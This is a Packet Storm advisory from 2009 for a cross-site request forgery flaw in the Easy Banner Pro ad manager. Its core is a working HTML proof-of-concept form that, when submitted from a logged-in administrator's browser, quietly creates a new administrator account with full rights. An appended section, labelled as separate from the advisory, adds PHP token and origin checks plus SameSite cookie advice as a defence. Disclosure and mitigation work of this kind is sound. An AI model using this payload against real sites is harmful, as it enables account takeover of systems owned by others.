Easy Banner Pro Cross Site Request Forgery

2009-12-15T00:00:00
ID PACKETSTORM:83790
Type packetstorm
Reporter bi0
Modified 2009-12-15T00:00:00

Description

` ______ __ ______  
/\ == \ /\ \ /\ __ \  
\ \ __< \ \ \ \ \ \/\ \  
\ \_____\ \ \_\ \ \_____\  
\/_____/ \/_/ \/_____/  
  
01000010 01101001 01001111  
  
[#]----------------------------------------------------------------[#]  
#  
# [+] Easy Banner Pro - [ CSRF ] Create Administrator Account  
#  
# // Author Info  
# [x] Author: bi0  
# [x] Contact: bukibv@hotmail.com  
# [x] Homepage : www.ssteam.ws  
# [x] Thanks: sp1r1t,packetdeath,Zer0flag,redking and ssteam.ws ...  
#  
[#]-------------------------------------------------------------------------------------------[#]  
#  
# [x] Exploit :  
#  
# [ CSRF ]  
#  
# [ Login ]  
# http://localhost/[path]/administration/index.php  
#  
# // Start CSRF  
|-------------------------------------------------------------------------------|  
<form action="http://localhost/[path]/administration/admins.php" method="POST">  
<input type="hidden" name="action" value="admin_created">  
<input name="username" value="adminlol" maxlength=15>  
<input name="password" maxlength=15 value="adminlol">  
<input name="email" maxlength="255" value="test@demo.com">  
<input name="name" maxlength="255" value="adminlol">  
<input type="hidden" name="rights[]" value="advertisers" CHECKED>  
<input type="hidden" name="rights[]" value="packages" CHECKED>  
<input type="hidden" name="rights[]" value="publishers" CHECKED>  
<input type="hidden" name="rights[]" value="ads" CHECKED>  
<input type="hidden" name="rights[]" value="def_ads" CHECKED>  
<input type="hidden" name="rights[]" value="black_zones" CHECKED>  
<input type="hidden" name="rights[]" value="backup" CHECKED>  
<input type="hidden" name="rights[]" value="email_u" CHECKED>  
<input type="hidden" name="rights[]" value="reset" CHECKED>  
<input type="hidden" name="rights[]" value="tmpl_msg" CHECKED>  
<input type="hidden" name="rights[]" value="admins" CHECKED>  
<input type="hidden" name="rights[]" value="config" CHECKED>  
<input type="submit" name="submit" value="Submit">  
</form>  
|-------------------------------------------------------------------------------|  
# // End of attack  
#  
[#]------------------------------------------------------------------------------------------[#]  
  
`
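
The proof-of-concept form works because it needs nothing but the logged-in administrator's session cookie to be accepted. A server-side guard for that handler, as an added example that is not part of the advisory or of Easy Banner Pro's code: the function names, the `csrf_token` field name, and the assumption that `session_start()` has already run are all hypothetical.

```php
<?php
// Added example, not Easy Banner Pro code. Hypothetical guard for a handler
// such as administration/admins.php; all names below are assumptions.
declare(strict_types=1);

// Issue (or reuse) a per-session token; print it into the admin form as a
// hidden "csrf_token" field when the form is rendered.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// True only when the posted token equals the session token (constant-time compare).
function csrf_token_valid(array $post, array $session): bool
{
    $sent = $post['csrf_token'] ?? '';
    $want = $session['csrf_token'] ?? '';
    return is_string($sent) && is_string($want) && $want !== '' && hash_equals($want, $sent);
}

// True when Origin (or, failing that, Referer) names this site's own origin.
function same_origin(array $server, string $expectedOrigin): bool
{
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    if (!is_string($source) || $source === '') return false;
    $p = parse_url($source);
    if (!is_array($p) || !isset($p['scheme'], $p['host'])) return false;
    $origin = strtolower($p['scheme'] . '://' . $p['host']) . (isset($p['port']) ? ':' . $p['port'] : '');
    return hash_equals(strtolower($expectedOrigin), $origin);
}

// Call inside the branch that handles a state-changing action (for example
// action=admin_created) before anything is written. $expectedOrigin is the
// site's own origin, e.g. "https://ads.example.test" (constructed value).
function require_csrf(string $expectedOrigin): void
{
    $isPost = ($_SERVER['REQUEST_METHOD'] ?? '') === 'POST';
    if (!$isPost || !same_origin($_SERVER, $expectedOrigin) || !csrf_token_valid($_POST, $_SESSION ?? [])) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token');
    }
}
```

Setting the session cookie's `SameSite` attribute to `Lax` or `Strict` is a useful second layer, since a form hosted on another site would then be submitted without the administrator's session.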